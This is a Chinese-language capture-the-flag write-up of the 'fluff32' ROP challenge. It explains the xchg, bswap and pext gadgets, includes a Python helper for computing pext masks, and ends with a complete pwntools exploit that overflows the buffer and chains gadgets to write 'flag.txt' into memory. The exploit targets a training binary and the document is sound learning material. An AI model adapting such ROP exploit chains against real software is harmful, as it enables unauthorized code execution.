如果知道这几个汇编指令的情况下这题其实还算是蛮简单,问题指令利用部分学到了xchg和bswap以及pext,自己做出来了很开心o( ̄▽ ̄ )ブ。
1 2 3 //ecx flag.txt address 0x08048558 : pop ecx ; bswap ecx ; ret 0x08048555 : xchg byte ptr [ecx], dl ; ret
xchg例子 这里引用的https://www.felixcloutier.com/x86/xchg
1 2 3 TEMP := DEST; DEST := SRC; SRC := TEMP;
bswap则是大小端序之间互相转换
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 TEMP := DEST IF 64-bit mode AND OperandSize = 64 THEN DEST[7:0] := TEMP[63:56]; DEST[15:8] := TEMP[55:48]; DEST[23:16] := TEMP[47:40]; DEST[31:24] := TEMP[39:32]; DEST[39:32] := TEMP[31:24]; DEST[47:40] := TEMP[23:16]; DEST[55:48] := TEMP[15:8]; DEST[63:56] := TEMP[7:0]; ELSE DEST[7:0] := TEMP[31:24]; DEST[15:8] := TEMP[23:16]; DEST[23:16] := TEMP[15:8]; DEST[31:24] := TEMP[7:0]; FI;
为了通过pext给edx赋值
1 2 3 0x08048543 89e8 mov eax, ebp 0x08048545 bbbababab0 mov ebx, 0xb0bababa 0x0804854a c4e262f5d0 pext edx, ebx, eax
写了个脚本..手算pext给edx赋值感觉还是属于沾点缺心眼
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 a="10110000101110101011101010111010" [::-1 ] flag="flag.txt" c=[] for l in flag: j = 0 b = "" flagbin=str (bin (ord (l)))[2 :][::-1 ] for i in range (len (flagbin)): while j < len (a) and flagbin[i] != a[j]: j+=1 b +="0" b += "1" j+=1 c.append(hex (int (b[::-1 ],2 ))) print (c)
exp如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 from pwn import * context(terminal=['tmux','new-window']) p=gdb.debug('./fluff32',"b pwnme") context.bits=32 c=b'A'*44 data=0x0804a018 bss=0x0804a020 flag=[p32(0xb4b), p32(0x2dd), p32(0x1d46), p32(0xb5a), p32(0xdb), p32(0xacd), p32(0x1ac5), p32(0xacd)] pop_ebp=0x080485bb pext_edx=0x08048543 pop_ecx_bswap_ecx=0x08048558 xchg_bytecx_dl=0x08048555 ret=p32(0x08048382) print_file=0x080483d0 payload=c for i in range(len(flag)): payload+=p32(pop_ebp)+flag[i] payload+=p32(pext_edx) payload+=p32(pop_ecx_bswap_ecx)+pack(bss+i,endian="big") payload+=p32(xchg_bytecx_dl) payload+=p32(print_file)+p32(0x0)+p32(bss) print(payload) p.sendline(payload) p.interactive()
